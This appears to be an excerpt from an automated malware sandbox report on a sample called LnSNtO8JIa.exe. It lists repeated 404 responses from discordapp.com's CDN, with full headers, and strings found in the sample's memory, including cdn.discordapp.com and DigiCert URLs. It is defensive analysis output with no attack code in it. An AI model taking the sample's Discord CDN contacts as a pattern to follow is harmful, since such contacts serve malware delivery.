        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:47 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8ab1b985a57-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 67Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:47 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=uqIY6L6yV0FYAxjCsrBabJniofT.xG673E8UpjKo1YA-1704353507-1-AUzLsLniEBxukIxIpEOefGh/mmiqrq5lirxBhpxfNYdIwx1UuhSk9XR86AYZv2BENfwIaUznPS5GY7IcdEINbNk=; path=/; expires=Thu, 04-Jan-24 08:01:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t0Q1yMk7Ny%2FDYEqC2GSL1y24T3yQDMEAgeCsHCTnogw1nq64ln1tMsFc5e4MJtRy%2BR4Scsn6US74KCeoyQjMeMkMOKrbbvsDFf8y8ItKZjfZ3n3h4SZfoRWWJCjKwPMNt%2FoQHQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ldbKZNpztVRMQaEo5tyGMBAQojxItRRlYvaOFsjPcuw-1704353507074-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:47 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8ae7a8f81df-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 80Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:47 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=gwWbK6HZqv9y1bIEqngKAy7dY2GFUycqfAeUk_8B44M-1704353507-1-AWPMabFn80KV4LtM2Dp07lQcFnAZ4VUj/b3pL28wfO5zRPL1x1aIyzJqkAq1nGIJp0FdYwLmorv0pKpjnngQZNA=; path=/; expires=Thu, 04-Jan-24 08:01:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1kJKYygWz0cyCAGfLevHgmE9%2FUseIF%2BwfYGlW2ZpikpVzkqd9CM1Y8xC5PzUBx6bOJ4IEa9NFSp6gTin%2BOdfHXBKtrLlRunQwKsE%2FtikN0OvcWQCqRt9KIooXT%2Bj1r%2B25JJa0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=uvPdi4I4C0NQbC1duke8bIDDNmmRX_8oBQpEZefThYE-1704353507617-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:49 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8b73be62033-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 91Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:49 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=_FfF9sYxnd44aA88mKrvBaFIPP96oH24KMzm8U5U1xg-1704353509-1-AbKx63eF3tPKUqHKM/LIzRlVEYdq5OU92z+IZjG3kGFY4I9707Zy4F094qXvvkR5wpNVTA1uCNbvZQBayQPALHU=; path=/; expires=Thu, 04-Jan-24 08:01:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vXiWhuZclrRpX0o4sVaCPC%2FKimZ4067f%2BqB81Xtt3m53mbAd%2Bczm7US%2BvHLuhnb5Xm2ybhiq4a%2BM4DirzRyhzIJKaNmhHR2J0D%2FaUQPwAm0drhrky7HOG4KP2DMcYrY6l47Xug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=s8y8U2pLJ2SJ8bqe_EHQoK5w0s_mLeyQez0TwOeBiw8-1704353509036-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:49 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8bbf8b13b65-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 93Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:49 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=1vygZKPW9og7_PYdHap6qBG8SN2mG5kFouvMzj2ak1Y-1704353509-1-Abz36OzqFffmmE+YY9a1+49WD2ckLNNDLuJBuWzdgIsAuIH+ZHJ0OiprKnnL57KDxHicfc3+ZbP84LVKyl4WMOo=; path=/; expires=Thu, 04-Jan-24 08:01:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=619VIImNn%2FgXHcncuQ86ZvVQsElQQbRBhAGB%2F6ON4mnkgjElsiDvqJ%2FwOT9Oq47JJHVNuOw%2Bq%2BpFxyS%2B17IKNjyGu2SbMcbG8Bh4CXoJViWN0il6TzSx7YIaHpIw2AFp9%2FRBPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=S_CzpvlDbk5nX_FlmOHCojiVGmzeGAkZhrV1R5cu6ts-1704353509777-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:50 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8c35b0a37ee-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 90Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:50 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzIX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=WD_HJYDYOwkqgC.pO7WATzFPblyQ74dAkIyS9UYKbD0-1704353510-1-AZcFlJJEZGLfx3YjVUPxVUoRSOOmIZBFsPMCMqF7A4PzRHpuCYmrL2Cugsih5v+F1bG87EgfkJ0t6oQ5OOPlZ18=; path=/; expires=Thu, 04-Jan-24 08:01:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E2%2Fxy1ErnpOH9oegaXGtrD82KHCZPDBkEQGT2oSRSUhMAQarXHMOYhaMa9%2B%2FBEfcjC0mYpf5nSKfnK8NcyE7Gn6pHooxELu30XnWV%2BuiyDbTWJQEfn8BApZRav3MnKCmXVcSPQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=l_GKyp3cGgQH52EJxHSZEQ_IC6VAXhUBtDl8WPH3SRs-1704353510981-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:51 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8c95e435788-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 73Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:51 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=C1o1sJSeKlBh2gluLruw51OSVdbMr9ZuVDScb2IJ40o-1704353511-1-ATSp86gwrcYSICQK5bGTW9KL5+PMmAlg06Qwj2x2+NSEb+gsqVT95SwW446oER4Pp0WWQzgJUnXhOav9EYEgEkM=; path=/; expires=Thu, 04-Jan-24 08:01:51 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vssf1sLLtiszSey8%2Bh1%2F%2BrnhGwfzlojFoEye50TP6Snr7yZbXBey%2B6K65SVR%2FlXFBk36NBzTAs%2BxgBMhs7%2BWu5btNRaO6D6aAHcXDjOjgPEp5o2i6%2BABfggmHKGP%2FIIHxfpwWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=adbOTmha16UpwnatoNnhIGO0NUIok.MI_yDgMSviU9k-1704353511929-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:52 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8d00bdc8298-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 85Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:52 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=rHk7M.OqTa3e2we83Xmx2nY4dhdMzktllg63llkHhfw-1704353512-1-AZdEpiRDqPip22KagnLNPppXGd9j+HVOgRuMvE2dA5ncbLPUTYc+c2mrgjQyDyyItyO9iKKZGOFAvniWAKaQh/Q=; path=/; expires=Thu, 04-Jan-24 08:01:52 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BcKK%2FzfcKv3bLVacTgYRERb49nH8tWI5%2BFoxqjNsgbRn%2BrxJFAViYFApC9TOCxu08x2SEFohR%2FOMiBpEJwwgPIc18IiC7hgMKj9x1RIh3v28Fl9JoDMjTg7IxmUE5YXdvCVn8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=LWlhh8YO8_vOYXt6.0V7F8KnfH87pcGE4IOpu.yfrDM-1704353512985-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:54 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8d7ee157fae-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 76Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:54 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=y89ICSfsVuz5eshIBsTSEHZEJZiMQh82rOINeIF0S.4-1704353514-1-AfoxCXqV5z62QYwXyK1O2w5wVs2sDx0fc1tNwDAWfoVMBNUEas0F7cskRvUqMU7xXs1zEUrXt7D7pCV7uAkI3YI=; path=/; expires=Thu, 04-Jan-24 08:01:54 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1hVQxMG6KvckiLFmg6mQjNx7BOl4dw4nyvt%2FWecYrt26n1c2ldkXWGnA6atr2holonY7lRyvSkpAz%2FmK0GHgl3iRaocr5x9WwZrW5tU%2Be33DEKZzMVyrrYDjgQ97xVjhb6uxpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=nBoQFiyzRz2K70WG3uMkn9XbM.WL0reZBRQaFNLuu_M-1704353514260-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:55 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8ddee77082c-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 90Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:55 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=isGB3wqXer8YWozl0Yf30iSDh.kDWAjVATxrLQln75o-1704353515-1-AdWn+geWbqvisRwckOU6M+9bd+qldHobYvBzT/KMGFs3416Xiaf48NH6sXS7M3gEC1Nsg3Ns4fbXMiLZlbXeWiY=; path=/; expires=Thu, 04-Jan-24 08:01:55 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DF2qy928BXSTqDQfC0QYwZFKmuygtk4LSY7KqqKoI%2FoXjaHrye0hVh4Q3Q3FAuG%2FHNLMJEmIugqwrUrfjK6gGvPj90pYD0ce3Vu2l4Slvn1i%2FNrpaXIwMds3bEPi%2BZjxopzp6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=AntLwAUL1CBH0o4ODgk4jFz1DjpRc.mWp3YYKerjViI-1704353515214-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:56 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8e55e468018-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 78Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:56 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=lTgSGsoZWbS.2RBH7sWkb8STsyAFc8a2TW.dJUU9aT8-1704353516-1-AfqLijJiOePrLF0KeqWvKD+r9uKxNAzhFy4yps/evUdvOU+5KS1l9rEZ1t5jcUYnkN2RFGcnVaiOd2ajjj0TknA=; path=/; expires=Thu, 04-Jan-24 08:01:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ov7azeOcTnZTHCyyE6SyfEKIpNrdJ4RWx384OdMoziVt%2FFmGrDIZPM19gqXFqLwWTmlYIvEkvo19KU0UsRRXjG4xwm0MLuyAoIoSneai6%2F2MBQOy2A%2FIML%2BYHluPA339EtIuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=aoVAy4Q9hsL9gSbY42CTStRZCY__wDA_BjCCoRc.MgM-1704353516412-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:57 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8ec2d087ffd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 79Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:57 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=CGCwx1svuAh4Nigjr56H1AV7Fr634tQnpuHmLCPnjpA-1704353517-1-AbfiF4AFpCma5uuHGwRofCRRehEELNl0JnCh6WObeQ6Bt38ljBeOuCsHWuO0Tf+2hhej6qmcgsL/U8lH9WqMyQo=; path=/; expires=Thu, 04-Jan-24 08:01:57 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GuHW7PSP9RkfYEytPvGI3a6GTXt7vqwq3J6NwdDfv0y7VzPbZeN41XeG9hH%2BMb36uUYkwbKVMPF8kbOTGYehds12FvJDe6g0gfKr0w533VyDGwz24FC1uRnjynFtgBfrIb6JyA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=EEYy.t5GruCiNMwgnFLu8BvmOUj3GKNkR80S6ZhhTbU-1704353517498-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:32:01 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c90398f43b05-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 105Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:32:01 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=safXEvY4faCtURwEi47VCNm_DKs3i91JEwr4gsIY504-1704353521-1-AeUPjLoYcUb+SqxacO4eAYjdxYkt/oG8s+67OKRoq8E4ZF52G7SGcEEFeS5ktpVenl7wtZlnCGaFmzCc/bhBifk=; path=/; expires=Thu, 04-Jan-24 08:02:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZpdWOsYg%2BHNg8lm1BhZpkA7WV7Fxmxbp9DI36CR3C5TwCqLNRjoTBzeuV4T6wQLGiz6hq2cv33pS4OARZSy7pQiLJ%2BCGESP1tmUNe%2FWk5bkEJarTPrFj%2FxuK%2FLPJV0NWD1rlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ZwR.dMvUVtInVIzGVeX4tZlzTVlQXjbXtlvjdZrS_Ck-1704353521234-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:32:01 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c903ac972078-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 103Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:32:01 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=nmi8nVZ0Lb6_jr9DU2dhz4nXdD8uq25umKWJEbVISmQ-1704353521-1-Abq6tCYEmMEejYhSYbDzHj5zGyyhmEHVV+iLtbigPV15A2y9T7zukS+8/lQrRF/wRA8GxSnneww6Q8rBz6sOolc=; path=/; expires=Thu, 04-Jan-24 08:02:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QBccw4L%2F8KrZYdo0k9ZGqUhfDstVQqPRTXCgI5hOyqQcZvunN%2B16mPOgv15iZ%2FfYhMTGWFJc4BslnD8b2PcURKq3pZcZHeBG6o9mL1XRoXCA8%2Fhcu639WTNpWdj211io4zJxVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=J_UxgM.d8guruwoSOOFje7KcHgE7X9TQKOSt2OICB9U-1704353521253-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:32:08 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c931fc4f82ce-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 101Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:32:08 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Yu.4zg534LBTjR.dw9Wf0zmzHoZ4k.QOdsHQ3_HqQVU-1704353528-1-Af+IOh1c6Qiu/sN0q0Mwzmjh6NdButtJzwtaSKSU613QA++GV7R23+qYf0NLjzXDsw/lv5Nz6Qcyc3NYgRbKYa0=; path=/; expires=Thu, 04-Jan-24 08:02:08 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDnm%2BN1v0sBvK1nOjBi8%2BpyY%2FrIgB5PwyAKS%2FUR3q8WdyvH2uqgopSpVn9AHl82PPtRuTZOV3CHIHggkKIql0lo1AiDVFiq7XNMF5z40v05QVQUiVBCU0NfAEf%2B6UwbycO%2Bv5w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=2_SHL5TuQEkZM.moo6UQh1r4wQ7_kY6oCIoau_DAkKg-1704353528676-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:32:09 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c9351a23390b-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 104Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:32:09 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=yL0xoqhX9hFpZwCPWPHLrKxvKUJB9_pz5nNsFHUzYj4-1704353529-1-AfDOz8vQ8eEwDyJc/fRpbB/BZq0LT9iczSKSBvaqDkLA3opbMMhyBiKm9j3f2cPtjQog/jR+ry5RsF5s8Xp22j8=; path=/; expires=Thu, 04-Jan-24 08:02:09 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mvYA5TuSmzeLNnth%2FSx1GO8udsfl0pSG3oiwSWmOxFqzxVmR1VKaJRUzq02dT18pDEiz5cqAEp7c8FZcfCFeSShJ9Lv9WW5Id1h27cYgzgq8fkCFvyAzj111kMIkT1JThVzxXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WOCxxQoCuIGMzHS22jupyq7Cc.53R67L5pitP7D58P8-1704353529162-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.0.dr, System.Data.SQLite.EF6.dll.0.dr, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.dr, System.Data.SQLite.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.0.dr, System.Data.SQLite.EF6.dll.0.dr, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.dr, System.Data.SQLite.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.0.dr, System.Data.SQLite.EF6.dll.0.dr, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.dr, System.Data.SQLite.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1F000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, LnSNtO8JIa.exe, 00000000.00000002.3365215653.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.0.dr, System.Data.SQLite.EF6.dll.0.dr, SQLite.Interop.dll0.0.dr, SQLite.Interop.dll.0.dr, System.Data.SQLite.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: LnSNtO8JIa.exe, 00000000.00000002.3382169411.000000000B601000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 00000005.00000002.3366078931.0000000003668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
        Source: Chrome.exe, 00000005.00000002.3366078931.0000000003668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com8Q
